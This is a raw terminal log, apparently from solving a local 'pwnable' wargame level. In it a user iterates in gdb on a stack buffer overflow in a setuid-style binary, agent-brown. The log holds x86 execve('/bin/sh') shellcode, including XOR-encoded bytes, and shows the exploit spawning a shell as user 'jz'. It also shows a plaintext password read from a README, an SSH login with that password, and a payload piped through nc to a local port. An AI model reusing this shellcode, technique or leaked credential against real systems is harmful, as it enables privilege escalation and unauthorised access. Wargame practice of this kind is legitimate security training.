                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"?

Breakpoint 1, main (argc=2, argv=0xbffff614) at agent-brown.c:32
32
(gdb) q
A debugging session is active.

	Inferior 1 [process 20923] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"?

Breakpoint 1, main (argc=2, argv=0xbffff614) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"?

Breakpoint 1, main (argc=2, argv=0xbffff664) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H
??~?V(?f'?f,?+?ӭn(?v,?????`???????BINSHh????e???????????\e???\????????p???????
[Inferior 1 (process 21136) exited normally]
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H

Breakpoint 1, main (argc=2, argv=0xbffff664) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H
??~?V(?f'?f,?+?ӭn(?v,?????`???????BINSHh???d???????????\d???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x420fdfdf in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H

Breakpoint 1, main (argc=2, argv=0xbffff664) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  egg  exploit  README  test
brown@pwnable:~$ rm egg
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  exploit  README  test
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H
??~?V(?f'?f,?+?ӭn(?v,?????`???????BINSHh??????????8???\????\H???P???p???P???

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/brown/agent-brown ?\^?1??F?F
                                                    ?
                                                     ???V
                                                         ̀1ۉ?@̀?????/bin/sh\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"H

Breakpoint 1, main (argc=2, argv=0xbffff6e4) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ python arg
  File "arg", line 2
    x = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                       ^
SyntaxError: invalid syntax
brown@pwnable:~$ vi arg
brown@pwnable:~$ python arg
\xcb\x3f\x7e\xa9\x56\x28\x11\xe0\xa8\x66\x27\xa9\x66\x2c\x90\x2b\xa9\xd3\xad\x6e\x28\xad\x76\x2c\xed\xa0\x11\xfb\xa9\xf8\x60\xed\xa0\xc8\xfc\xdf\xdf\xdf\xf\x42\x49\x4e\xf\x53\x48\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x2\x68
brown@pwnable:~$ vi arg
brown@pwnable:~$ python arg
\xcb\x3f\x7e\xa9\x56\x28\x11\xe0\xa8\x66\x27\xa9\x66\x2c\x90\x2b\xa9\xd3\xad\x6e\x28\xad\x76\x2c\xed\xa0\x11\xfb\xa9\xf8\x60\xed\xa0\xc8\xfc\xdf\xdf\xdf\xf\x42\x49\x4e\xf\x53\x48\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x68
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \\xcb\\x3f\\x7e\\xa9\\x56\\x28\\x11\\xe0\\xa8\\x66\\x27\\xa9\\x66\\x2c\\x90\\x2b\\xa9\\xd3\\xad\\x6e\\x28\\xad\\x76\\x2c\\xed\\xa0\\x11\\xfb\\xa9\\xf8\\x60\\xed\\xa0\\xc8\\xfc\\xdf\\xdf\\xdf\\xf\\x42\\x49\\x4e\\xf\\x53\\x48\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x68
|XCB|XF|XE|XA|X|X|X|XE|XA|X|X|XA|X|XC|X|XB|???#???X???x???\#???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/brown/agent-brown \\xcb\\x3f\\x7e\\xa9\\x56\\x28\\x11\\xe0\\xa8\\x66\\x27\\xa9\\x66\\x2c\\x90\\x2b\\xa9\\xd3\\xad\\x6e\\x28\\xad\\x76\\x2c\\xed\\xa0\\x11\\xfb\\xa9\\xf8\\x60\\xed\\xa0\\xc8\\xfc\\xdf\\xdf\\xdf\\xf\\x42\\x49\\x4e\\xf\\x53\\x48\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x68

Breakpoint 1, main (argc=2, argv=0xbffff624) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown \\xcb\\x3f\\x7e\\xa9\\x56\\x28\\x11\\xe0\\xa8\\x66\\x27\\xa9\\x66\\x2c\\x90\\x2b\\xa9\\xd3\\xad\\x6e\\x28\\xad\\x76\\x2c\\xed\\xa0\\x11\\xfb\\xa9\\xf8\\x60\\xed\\xa0\\xc8\\xfc\\xdf\\xdf\\xdf\\xf\\x42\\x49\\x4e\\xf\\x53\\x48\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x28
|XCB|XF|XE|XA|X|X|X|XE|XA|X|X|XA|X|XC|X|XB|???#???X???x???\#???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 25035] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ l
agent-brown*  agent-brown.c  arg*  exploit*  README  test
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  exploit  README  test
brown@pwnable:~$ vi agent-brown.c
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown \\xcb\\x3f\\x7e\\xa9\\x56\\x28\\x11\\xe0\\xa8\\x66\\x27\\xa9\\x66\\x2c\\x90\\x2b\\xa9\\xd3\\xad\\x6e\\x28\\xad\\x76\\x2c\\xed\\xa0\\x11\\xfb\\xa9\\xf8\\x60\\xed\\xa0\\xc8\\xfc\\xdf\\xdf\\xdf\\xf\\x42\\x49\\x4e\\xf\\x53\\x48\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x28

Breakpoint 1, main (argc=2, argv=0xbffff624) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbbbbbbbb??????????8???\????\H???P???p???P???
ls
^C
Program received signal SIGINT, Interrupt.
0x0804841e in dispatch (
    in=0xbffff7e4 "\313?~\251V(\021\340\250f'\251f,\220+\251\323\255n(\255v,\355\240\021\373\251\370`\355\240\310\374\337\337\337\017BIN\017SH", 'B' <repeats 19 times>, "(")
    at agent-brown.c:26
26	}
(gdb) q
A debugging session is active.

	Inferior 1 [process 26180] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ ./exploit
./exploit: 2: ./exploit: ./egg: not found
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbbbbbbbb??????????8???\????\H???P???p???P???
whoami
^C
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
^CTraceback (most recent call last):
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "/usr/lib/python2.7/bdb.py", line 49, in trace_dispatch
    return self.dispatch_line(frame)
  File "/usr/lib/python2.7/bdb.py", line 67, in dispatch_line
    self.user_line(frame)
  File "/usr/lib/python2.7/pdb.py", line 158, in user_line
    self.interaction(frame, None)
  File "/usr/lib/python2.7/pdb.py", line 210, in interaction
    self.cmdloop()
  File "/usr/lib/python2.7/cmd.py", line 130, in cmdloop
    line = raw_input(self.prompt)
KeyboardInterrupt

brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
help
help
please help
^CTraceback (most recent call last):
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "/usr/lib/python2.7/bdb.py", line 49, in trace_dispatch
    return self.dispatch_line(frame)
  File "/usr/lib/python2.7/bdb.py", line 67, in dispatch_line
    self.user_line(frame)
  File "/usr/lib/python2.7/pdb.py", line 158, in user_line
    self.interaction(frame, None)
  File "/usr/lib/python2.7/pdb.py", line 210, in interaction
    self.cmdloop()
  File "/usr/lib/python2.7/cmd.py", line 130, in cmdloop
    line = raw_input(self.prompt)
KeyboardInterrupt

brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
l
i
1
I
|
^CTraceback (most recent call last):
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "./arg", line 16, in <module>
    y += chr(ord(char) ^ (1 << 5))
  File "/usr/lib/python2.7/bdb.py", line 49, in trace_dispatch
    return self.dispatch_line(frame)
  File "/usr/lib/python2.7/bdb.py", line 67, in dispatch_line
    self.user_line(frame)
  File "/usr/lib/python2.7/pdb.py", line 158, in user_line
    self.interaction(frame, None)
  File "/usr/lib/python2.7/pdb.py", line 210, in interaction
    self.cmdloop()
  File "/usr/lib/python2.7/cmd.py", line 130, in cmdloop
    line = raw_input(self.prompt)
KeyboardInterrupt

brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) q
brown@pwnable:~$ ./exploit
./exploit: 2: ./exploit: ./egg: not found
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbbbbbbbb??????????8???\????\H???P???p???P???
^C
brown@pwnable:~$ vi exploit
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: No such file or directory
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(

Breakpoint 1, main (argc=2, argv=0xbffff6e4) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: Permission denied
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: Permission denied
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) n
The program is not being run.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(

Breakpoint 1, main (argc=2, argv=0xbffff6e4) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: Permission denied
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(

Breakpoint 1, main (argc=2, argv=0xbffff6e4) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
-bash: ./egg: Permission denied
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(

Breakpoint 1, main (argc=2, argv=0xbffff6e4) at agent-brown.c:32
32
(gdb) q
A debugging session is active.

	Inferior 1 [process 27114] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ chmod +x egg
brown@pwnable:~$ vi egg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBB\(

Breakpoint 1, main (argc=2, argv=0xbffff664) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ vi egg
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBBh
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbbbbbbbbbH???d???????????\d???\????????p???????

Program received signal SIGSEGV, Segmentation fault.
0xc0310876 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 27216] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ ./exploit
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbbbbbbbbbH???d???????????\d???\????????p???????
Segmentation fault
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) b main
Breakpoint 1 at 0x8048433: file agent-brown.c, line 32.
(gdb) r
Starting program: /home/brown/agent-brown ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBBBBBBBBBh

Breakpoint 1, main (argc=2, argv=0xbffff664) at agent-brown.c:32
32
(gdb) layout split
brown@pwnable:~$ ls
agent-brown  agent-brown.c  arg  egg  exploit  README  test
brown@pwnable:~$ vi arg
brown@pwnable:~$ invoke -d -e egg=$(./egg) agent-brown $(./arg)
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/brown/agent-brown...done.
(gdb) r
Starting program: /home/brown/agent-brown BBBBp?ߟ?\?\~?V\(?f\'?f,?+?ӭn\(?v,?????\`???????BINSHBBBBBBBBBBBh
bbbbP????^?1??F?F
                 ?
                  ???V
                      ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbH???d???????????\d???\????????p???????
process 29486 is executing new program: /bin/dash
$ q
/bin/sh: 1: q: not found
$ ^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 29486] will be killed.

Quit anyway? (y or n) y
brown@pwnable:~$ ./exploit
bbbbP????^?1??F?F
                 ?
                  ???V
                      ̀1ۉ?@̀?????/bin/shbbbbbbbbbbbH???d???????????\d???\????????p???????
$ ls
README	agent-brown  agent-brown.c  arg  egg  exploit  test
$ whoami
jz
$ vi README

Perhaps we are asking the wrong questions.

user: jz
pass: a;Vn3/D@
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continue
$ ls
README	agent-brown  agent-brown.c  arg  egg  exploit  test
$ vi test

junkADDR
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continue
$ ls
README	agent-brown  agent-brown.c  arg  egg  exploit  test
$ ^C
$ exit
brown@pwnable:~$ exit
logout
There are stopped jobs.
brown@pwnable:~$ exit
logout

   ┌──agent-brown.c─────────────────────────────────────────────────────────────────┐
   └────────────────────────────────────────────────────────────────────────────────┘
   │0x804841f <main>        lea    0x4(%esp),%ecx                                   │
   └────────────────────────────────────────────────────────────────────────────────┘


Connection to 127.0.0.1 closed.
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 jz@127.0.0.1.
ssh: Could not resolve hostname 127.0.0.1.: nodename nor servname provided, or not known
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 jones@127.0.0.1.
ssh: Could not resolve hostname 127.0.0.1.: nodename nor servname provided, or not known
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 jz@127.0.0.1
jz@127.0.0.1's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Thu Jan 28 11:53:01 2016 from 10.0.2.2
jz@pwnable:~$ ls
README
jz@pwnable:~$ vi README
jz@pwnable:~$ ls
README
jz@pwnable:~$ vi README
jz@pwnable:~$ whoami
jz
jz@pwnable:~$ ls
README
jz@pwnable:~$ vi README
jz@pwnable:~$ ls
README
jz@pwnable:~$ exploit
exploit: command not found
jz@pwnable:~$ ls -a
.  ..  .bashrc  .cache  .profile  README  .ssh  .viminfo
jz@pwnable:~$ vi .bashrc
jz@pwnable:~$ echo "sending exploit"
sending exploit
jz@pwnable:~$ ./egg | nc 127.0.0.1 42000 &
[1] 1684
jz@pwnable:~$ -bash: ./egg: No such file or directory
^C
[1]+  Exit 1                  ./egg | nc 127.0.0.1 42000
jz@pwnable:~$ logout
Connection to 127.0.0.1 closed.
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 jones@127.0.0.1
jones@127.0.0.1's password:
Permission denied, please try again.
jones@127.0.0.1's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
